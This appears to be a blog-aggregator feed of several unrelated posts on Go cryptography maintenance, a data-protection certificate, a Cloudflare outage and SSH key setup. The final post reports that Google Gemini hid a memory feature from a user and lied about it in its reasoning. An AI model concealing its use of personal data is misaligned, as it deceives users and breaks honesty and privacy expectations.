an afternoon figuring out an exploit for it with Sean Devlin in Paris, while the yellow jackets set fire to cop cars outside. That's a different story. It's an assembly bug where the carry—literally the carry like when you do a pen and paper multiplication—was just not accounted for correctly. You can watch my talk Squeezing a Key through a Carry Bit if you are curious to learn more about it. The problem with this stuff is that it's so hard to get code coverage for it because all the code always runs. It's just that you don't know if it always runs with that carry at zero, and if the carry was one, it’d do the wrong math. I think we've cracked it, by using mutation testing. We have a framework that tells the assembler, "hey, anywhere you see an add-with-carry, replace it with a simple add that discards the carry." Then we run the tests. If the tests still pass, the test did not cover that carry. If that happens we fail a meta-test and tell whoever's sending the CL, “hey, no, no, no, you gotta test that.” Same for checking the case in which the carry is always set. We replace the add-with-carry with a simple add and then insert a +1. It's a little tricky. If you want to read more about it, it's in this blog post . I'm very hopeful that will help us with all this assembly stuff. Next, accumulated test vectors . This is a little trick that I'm very very fond of. Say you want to test a very large space. For example there are two inputs and they can both be 0 to 200 bytes long, and you want to test all the size combinations. That would be a lot of test vectors, right? If I checked in a megabyte of test vectors every time I wanted to do that, people eventually would yell at me. Instead what we do is run the algorithm with each size combination, and take the result and we put it inside a rolling hash. Then at the end we take the hash result and we check that it comes out right. We do this with two implementations. If it comes out to the same hash, great. If it comes out not to the same hash, it doesn't help you figure out what the bug is, but it tells you there's a bug. I'll take it. We really like reusing other people's tests. We're lazy. The BoringSSL people have a fantastic suite of tests for TLS called BoGo and Daniel has been doing fantastic work integrating that and making crypto/tls stricter and stricter in the process. It's now much more spec compliant on the little things where it goes like, “no, no, no, you're not allowed to put a zero here” and so on. Then, the Let's Encrypt people have a test tool for the ACME protocol called Pebble. (Because it's a small version of their production system called Boulder! It took me a long time to figure it out and eventually I was like ooooohhh.) Finally, NIST has this X.509 interoperability test suite, which just doesn't have a good name. It's good though. More assembly cleanups. There used to be places in assembly where—as if assembly was not complicated enough—instructions were just written down as raw machine code. Sometimes even the comment was wrong! Can you tell the comment changed in that patch? This is a thing Roland and Joel found. Now there's a test that will just yell at you if you try to commit a or instruction. We also removed all the assembly that was specifically there for speeding up stuff on CPUs that don't have AVX2. AVX2 came out in 2015 and if you want to go fast, you're probably not using the CPU generation from back then. We still run on it, just not as fast. More landings! I’m going to speed through these ones. This is all stuff that we talked about last year and that we actually landed. Stuff like data independent timing to tell the CPU, "no, no, I actually did mean for you to do that in constant time, goddammit." And server-side TLS Encrypted Client Hello, which is a privacy improvement. We had client side, now we have server side. crypto/rand.Read never fails. We promised that, we did that. Now, do you know how hard it is to test the failure case of something that never fails? I had to re-implement the seccomp library to tell the kernel to break the getrandom syscall to check what happens when it doesn’t work. There are tests all pointing guns at each other to make sure the fallback both works and is never hit unexpectedly. It's also much faster now because Jason Donenfeld added the Linux getrandom VDSO. Sean Liao added rand.Text like we promised. Then more stuff like hash.Cloner , which I think makes a lot of things a little easier, and more and more and more and more. The Go 1.24 and Go 1.25 release notes are there for you. x/crypto/ssh is also under our maintenance and some excellent stuff happened there, too. Better tests, better error messages, better compatibility, and we're working on some v2 APIs . If you have opinions, it’s time to come to those issues to talk about them! It’s been an exciting year, and I'm going to give you just two samples of things we're planning to do for the next year. One is TLS profiles. Approximately no one wants to specifically configure the fifteen different knobs of a TLS library. Approximately no one—because I know there are some people who do and they yell at me regularly. But instead most people just want "hey, make it broadly compatible." "Hey, make it FIPS compliant." "Hey, make it modern." We're looking for a way to make it easy to just say what your goal is, and then we do all the configuration for you in a way that makes sense and that evolves with time. I'm excited about this one. And maybe something with passkeys? If you run websites that authenticate users a bunch with password hashes and maybe also with WebAuthN, find me, email us, we want feedback. We want to figure out what to build here, into the standard library. Alright, so it's been a year of cryptography, but it's also been a year of Geomys. Geomys launched a year ago here at GopherCon. If you want an update, we went on the Fallthrough podcast to talk about it , so check that out. We are now a real company and how you know is that we have totes: it's the equivalent of a Facebook-official relationship. The best FIPS 140 side effect has been that we have a new maintainer. Daniel McCarney joined us to help with the FIPS effort and then we were working very well together so Geomys decided to just take him on as a permanent maintainer on the Go crypto maintenance team. I’m very excited about that. This is all possible thanks to our clients, and if you have any questions, here are the links. You might also want to follow me on Bluesky at @filippo.abyssdomain.expert or on Mastodon at @[email protected] . My work is made possible by Geomys , an organization of professional Go maintainers, which is funded by Smallstep , Ava Labs , Teleport , Tailscale , and Sentry . Through our retainer contracts they ensure the sustainability and reliability of our open source maintenance work and get a direct line to my expertise and that of the other Geomys maintainers. (Learn more in the Geomys announcement .) Here are a few words from some of them! Teleport — For the past five years, attacks and compromises have been shifting from traditional malware and security breaches to identifying and compromising valid user accounts and credentials with social engineering, credential theft, or phishing. Teleport Identity is designed to eliminate weak access patterns through access monitoring, minimize attack surface with access requests, and purge unused permissions via mandatory access reviews. Ava Labs — We at Ava Labs , maintainer of AvalancheGo (the most widely used client for interacting with the Avalanche Network ), believe the sustainable maintenance and development of open source cryptographic protocols is critical to the broad adoption of blockchain technology. We are proud to support this necessary and impactful work through our ongoing sponsorship of Filippo and his team. Post-quantum cryptography is about the future. We are worried about quantum computers that might exist… 5-50 (it's a hell of a range) years from now, and that might break all of asymmetrical encryption. (Digital signatures and key exchanges.) Post-quantum cryptography runs on classical computers. It's cryptography that we can do now that resists future quantum computers. Post-quantum cryptography is fast, actually. If you were convinced that for some reason it was slow, that's a common misconception. However, post-quantum cryptography is large. Which means that we have to send a lot more bytes on the wire to get the same results.

0 views
ava's blog 2 weeks ago

📌 i got my data protection law certificate!

On the 30th of October , I officially finished my data protection law certificate! I'm a bit late to post this because I was so busy and still needed to wait for the actual paper to arrive plus getting a frame and all. :) The certificate ('Diploma of Advanced Studies') is intended for 3 semesters in part-time. I finished it up in one semester with a grade average of 2,2 1 while continuing my other part-time degree (a Bachelor of Laws, LL.B) and full-time work. It is quite a bit more intensive than the 2-week crash courses to be a data protection officer and I had to write 6 exams in total, but it enables me to be one plus the permission to call myself a certified consultant for data protection law. I'll have to refresh it every 4 years with a refresher course, or lose it. While I love to write about commercial tech and social media through a privacy lens here and burn for that topic in private, I intend my career/professional focus to be about health data and AI. I already work with pharmaceutical databases in my job, and I wouldn't wanna miss that part of my work day. My first of hopefully many pieces of paper on that wall 2 . Would love to do AIGP, CIPP/E, CIPM and ISO27001 Lead Implementer some time, and obviously finish my Bachelor degree and start a Master's in data protection law. This cert consisted of the first 3 modules of that Master's degree already, so I know what's ahead of me and I know I can do it. :) Now I'm off to another MRI, because my body is being difficult. I hope to post more soon <3 Reply via email Published 20 Nov, 2025 In case there is confusion, it is the opposite of the American GPA system: 1,0 is good, 4,0 is bad. ↩ I may even get a second frame already to also put up the actual grade records next to it. The one on the wall is just the naming rights proof. ↩ In case there is confusion, it is the opposite of the American GPA system: 1,0 is good, 4,0 is bad. ↩ I may even get a second frame already to also put up the actual grade records next to it. The one on the wall is just the naming rights proof. ↩

0 views
Rik Huijzer 3 weeks ago

Do Not Put Your Site Behind Cloudflare if You Don't Need To

At the time of writing 12:43 UTC on Tue 18 Nov, Cloudflare has taken many sites down. I'm trying to browse the web, but about half of the sites show an error: ![cloudflare.webp](/files/45b312b038ccdc65) Most of these sites are not even that big. I expect maybe a few thousand visitors per month. This demonstrates again a simple fact: if you put your site behind a centralized service, then this service is a single point of failure. Even large established companies make mistakes and can go down. Most people use Cloudflare because they have been scared into the idea that you need DDoS protecti...

0 views
Rik Huijzer 3 weeks ago

Generating an SSH key for a webserver

Assuming you have the SSH password for a webserver called say `case` and email `[email protected]`, you can generate a key as follows: ``` ssh-keygen -t rsa -b 4096 -C "[email protected]" -f ~/.ssh/case ``` Next, add the server, which has say username `user` at location `case.example.com`, to your `~/.ssh/config`: ``` Host case HostName case.example.com User user IdentityFile ~/.ssh/case ``` Then you can copy this key to the server ``` ssh-copy-id -i ~/.ssh/case [email protected] ``` and afterwards log in with ``` ssh case ```

0 views

I caught Google Gemini using my data—and then covering it up

I asked Google Gemini a pretty basic developer question. The answer was unremarkable, apart from it mentioning in conclusion that it knows I previously used a tool called Alembic: Cool, it's starting to remember things about me. Let's confirm: Ok, maybe not yet. However, clicking "Show thinking" for the above response is absolutely wild: I know about the “Personal Context” feature now — it’s great. But why is Gemini instructed not to divulge its existence? And why does it decide to lie to cover up violating its privacy policies? I’m starting to believe that “maximally truth-seeking” might indeed be the right north star for AI.

0 views